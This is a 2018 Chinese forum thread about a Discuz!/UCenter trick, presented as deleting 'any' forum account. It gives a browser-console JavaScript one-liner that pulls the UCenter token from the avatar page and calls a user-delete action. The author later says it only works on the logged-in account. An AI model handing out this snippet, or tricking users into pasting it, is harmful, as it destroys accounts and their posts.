不要哀求,学会争取;若是如此,终有所获。 收藏本站
登陆 / 注册 搜索

阅读: 10.8K   回复: 4

[# 网络安全] 删除任意 discuz 论坛的账号漏洞

小执念 古黑浩劫论坛大牛 2018-10-21 20:25 |显示全部楼层

可遇不可求的事:故乡的云,上古的玉,随手的诗,十九岁的你。

管理员
测试了一下,适用于所有版本的discuz程序,包括最新版!

漏洞说明:

1、执行后,如果显示大于 0 的整数,说明帐号删除成功。
2、删除的是 UCenter 内的帐号,UCenter 会通知 Discuz! 删除用户帐号。
3、通知可能出现延迟,或不成功。因此可能不会立即登出网站
4、如果通知最终成功,该帐号及其所有帖子都会从 Discuz! 中删除。
5、如果通知不成功,帐号登出后也将无法登录。此时可以注册一个新的同名帐号,覆盖原帐号。原帐号信息将被删除,其帖子将无法阅读(但不会删除)。

没有后悔药,自己其他网站的账号请不要胡乱操作!

步骤:F12 --> 在 Console 中输入:

  1. location.href=((d=(await(await fetch("./home.php?mod=spacecp&ac=avatar",{credentials:'include'})).text()).match(/\/\/\S+\/images\/ca\S+&ag/g)[0].replace('images/camera.swf?','?m=user&a=delete&'))&&confirm('真的要[永久]删除你的ID?'))?d:'';
复制代码


然后按下回车:

删除任意 discuz 论坛的账号漏洞 QQ截图20181021201954.png

浏览器会提示:

删除任意 discuz 论坛的账号漏洞 QQ截图20181021201941.png

因为我自己加了 WAF 防御规则,所以这个漏洞在古黑被拦截下来了:

删除任意 discuz 论坛的账号漏洞 Img-7.png


小执念 古黑浩劫论坛大牛 2018-10-21 20:26 |显示全部楼层

可遇不可求的事:故乡的云,上古的玉,随手的诗,十九岁的你。

管理员
只能删除当前登陆的账号!
站在记忆的边缘 「出类拔萃」 2018-10-23 19:42 来自手机 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

鼎力支持!!
xjh 「初入古黑」 2018-10-24 15:51 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

支持
流星☆坠落 「出类拔萃」 2018-10-24 19:16 来自手机 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

元芳你怎么看?
您需要登录后才可以回帖 登录 | 免费注册  

本版积分规则

关于本站|大事记|小黑屋|古黑论 网站统计

GMT+8, 2020-11-30 19:54 , Processed in 0.045299 second(s), 21 queries , Redis On.

© 2015-2020 GuHei.Net

Powered by Discuz! X3.4

快速回复 返回列表